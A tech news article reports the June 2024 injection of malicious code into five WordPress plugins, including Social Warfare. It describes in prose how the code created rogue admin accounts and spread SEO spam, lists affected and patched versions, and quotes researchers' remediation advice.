Skip to content

Flaws in 5 WordPress plugins grant admin privileges to attackers

  • by
  • 2 min read

Several malicious code injections in five WordPress plugins were discovered on June 24, 2024, allowing attackers to create new administrative accounts and control the compromised website. The vulnerable WordPress plugins are Social Warfare, BLAZE Retail Widget, Wrapper Link Elementor, Contact Form 7 Multi-Step Addon, and Simply Show Hooks.

The initial flaw was observed on June 22 in the Social Warfare plugin, which has over 30,000 installations. Over the next couple of days, researchers discovered four other plugins with a similar flaw. Despite notifying the WordPress plugin teams about these additional threats, there has been no official response, although WordPress has delisted the affected plugins from the repository.

Here’s a list of known compromised plugins and their respective patched versions:

PluginAffected VersionsPatched Version
Social Warfare4.4.6.4 to 4.4.7.14.4.7.3
Blaze Widget2.2.5 to 2.5.2None
Wrapper Link Element1.0.2 to 1.0.3The latest version is tagged as 1.0.0; users are advised to remove it until a properly tagged version is released
Contact Form 7 Multi-Step Addon1.0.4 to 1.0.5None
Simply Show Hooks1.2.1None

The injected malware is designed to create new administrative user accounts and relay their details to an attacker-controlled server. Additionally, malicious JavaScript is embedded into the footer of compromised websites, distributing SEO spam.

The malware’s simplicity, lack of obfuscation, and commented code suggested to researchers that it was easy to trace. The earliest detected injection dates back to June 21, and the malicious codes are updated continuously.

Researchers have advised users to check and delete any unauthorised WordPress administrative user accounts, run a malware check, remove any malicious code and update to safe plugin versions.

“If you have any of these plugins installed, you should consider your installation compromised and immediately go into incident response mode. We recommend checking your WordPress administrative user accounts and deleting any unauthorised ones, along with running a complete malware scan with the Wordfence plugin or Wordfence CLI and removing any malicious code,” said researchers.

At the start of this month, a critical vulnerability in the Arbitrary Options Update Flaw was discovered affecting 40,000 websites. In May, three WordPress plugins were found to be affected by severe flaws.

A LayerSlider bug was discovered in May, affecting more than a million WordPress websites.

In the News: Julian Assange freed; reaches plea deal to avoid US imprisonment

Kumar Hemant

Kumar Hemant

Deputy Editor at Candid.Technology. Hemant writes at the intersection of tech and culture and has a keen interest in science, social issues and international relations. You can contact him here: kumarhemant@pm.me

>